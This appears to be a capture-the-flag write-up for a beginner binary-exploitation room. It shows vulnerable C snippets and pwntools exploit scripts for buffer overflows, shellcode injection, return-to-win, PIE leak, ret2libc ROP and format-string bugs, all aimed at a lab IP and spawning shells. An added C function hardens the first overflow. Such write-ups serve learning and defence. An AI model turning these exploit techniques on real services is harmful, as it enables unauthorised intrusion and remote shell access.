TryPwnMe One

A beginner-friendly series on binary exploitation across buffer overflows, return-to-win, shellcode injection and format string vulnerabilities.

TryOverflowMe 1

Target: 10.10.4.76:9003

A classic stack buffer overflow: input past the end of the 16-byte buffer spills into the adjacent `admin` variable, which unlocks the flag read.

Relevant Code:

int admin = 0;
char buf[0x10];
gets(buf);
if (admin) { /* read flag.txt */ }

Exploit Script:

from pwn import *

p = remote('10.10.4.76', 9003)
payload = b'A' * 16 + p32(1) * 32
p.sendline(payload)
p.interactive()
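
Added here as a defensive counterpart to the TryOverflowMe 1 bug, not part of the original writeup or the challenge code: a bounded replacement for `gets()` that keeps the same stack layout (a 16-byte buffer beside `admin`) but discards excess input instead of letting it spill. The `input_t` in-memory source and the helper names are assumptions made for this example so it runs offline.

```c
#include <stddef.h>
#include <string.h>

/* Minimal in-memory input source standing in for stdin, so the reader
 * can be exercised deterministically without a live socket or file. */
typedef struct { const char *data; size_t len; size_t pos; } input_t;

static int next_byte(input_t *in) {
    return in->pos < in->len ? (unsigned char)in->data[in->pos++] : -1;
}

/* Bounded replacement for gets(): stores at most cap-1 bytes plus a NUL
 * in buf, then drains the rest of the line so the excess is dropped
 * instead of spilling into neighbouring stack variables like `admin`. */
size_t read_line_bounded(input_t *in, char *buf, size_t cap) {
    size_t n = 0;
    int c;
    if (cap == 0) return 0;
    while ((c = next_byte(in)) != -1 && c != '\n') {
        if (n + 1 < cap) buf[n++] = (char)c;  /* keep room for the NUL */
        /* else: discard the byte, never write past the buffer */
    }
    buf[n] = '\0';
    return n;
}

/* Hardened TryOverflowMe 1 check: same layout as the challenge (admin
 * next to a 16-byte buffer), but with the bounded read the input can
 * never reach admin, so the flag branch depends only on program logic. */
int admin_after_input(const char *line, size_t line_len) {
    int admin = 0;
    char buf[0x10];
    input_t in = { line, line_len, 0 };
    read_line_bounded(&in, buf, sizeof buf);
    return admin;
}

/* Test helper: read a line into a 16-byte buffer, return the stored length. */
size_t stored_len_16(const char *line) {
    char buf[0x10];
    input_t in = { line, strlen(line), 0 };
    return read_line_bounded(&in, buf, sizeof buf);
}
```

Feeding the writeup's `'A' * 16 + p32(1)` pattern through `admin_after_input` leaves `admin` at 0, where the original `gets()` version would have set it.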

TryOverflowMe 2

Target: 10.10.4.76:9004

Filling the 64-byte buffer and then overwriting `admin` with 0x59595959 satisfies the comparison and triggers the `read_flag()` call.

Relevant Code:

int admin = 0;
char buf[64];
gets(buf);
if (admin == 0x59595959) { read_flag(); }

Exploit Script:

from pwn import *

p = remote('10.10.4.76', 9004)
payload = b'A' * 64 + p32(0x59595959) * 32
p.sendline(payload)
p.interactive()

TryExecMe

Target: 10.10.4.76:9005

The program calls the input buffer as a function, so we send shellcode generated with Pwntools' `shellcraft.sh()`.

Relevant Code:

char *buf[128];
read(0, buf, sizeof(buf));
((void(*)())buf)();

Exploit Script:

from pwn import *

context.arch = 'amd64'
p = remote('10.10.4.76', 9005)
shellcode = asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()

TryRetMe

Target: 10.10.4.76:9006

Overflow the buffer and overwrite the return address to jump to `win()`.

Relevant Code:

void vuln() {
  read(0, buf, 0x200);
}
int win() {
  system("/bin/sh");
}

Exploit Script:

from pwn import *

context.binary = binary = ELF("tryretme")
p = remote('10.10.4.76', 9006)
rop = ROP(binary)
ret = rop.find_gadget(["ret"])[0]
win = binary.symbols["win"]

payload = b"A"*256 + b"B"*8 + p64(ret) + p64(win)
p.sendline(payload)
p.interactive()

Random Memories

Target: 10.10.4.76:9007

The program prints the address of `vuln`, which leaks the PIE base; from that we compute the runtime address of `win()`.

Relevant Code:

printf("Secret: %llx", &vuln);

Exploit Script:

# binary, rop, ret and p are set up as in the TryRetMe script (port 9007 here)
recv = int(p.recvline().decode().strip(), 16)
base = recv - binary.symbols["vuln"]
binary.address = base
payload = b"A"*256 + b"B"*8 + p64(ret) + p64(binary.symbols["win"])
p.sendline(payload)
p.interactive()

TheLibrarian

Target: 10.10.4.76:9008

ROP chain to leak puts@GOT, calculate the libc base from it, then return to `system("/bin/sh")`.

Relevant Code:

puts(binary.got["puts"])   # first stage: leaks the libc address of puts, giving the libc base
system("/bin/sh")          # second stage, once the libc base is known

Exploit Script:

# pop_rdi holds the address of a `pop rdi; ret` gadget, located with rop.find_gadget as in TryRetMe
payload = b"A"*256 + b"B"*8 + p64(pop_rdi) + p64(binary.got["puts"]) + p64(binary.plt["puts"]) + p64(binary.symbols["vuln"])
p.sendline(payload)
# use leaked puts to calculate libc base

Not Specified

Target: 10.10.4.76:9009

A format string vulnerability: the user-controlled format lets `%p` leak stack contents and `%n` write to memory.

Relevant Code:

printf(username);

Exploit Script:

from pwn import *

# binary and p are set up as in the earlier scripts; 6 is the argument index at which our input appears on the stack
payload = fmtstr_payload(6, {binary.got["puts"]: binary.symbols["win"]})
p.sendline(payload)
p.interactive()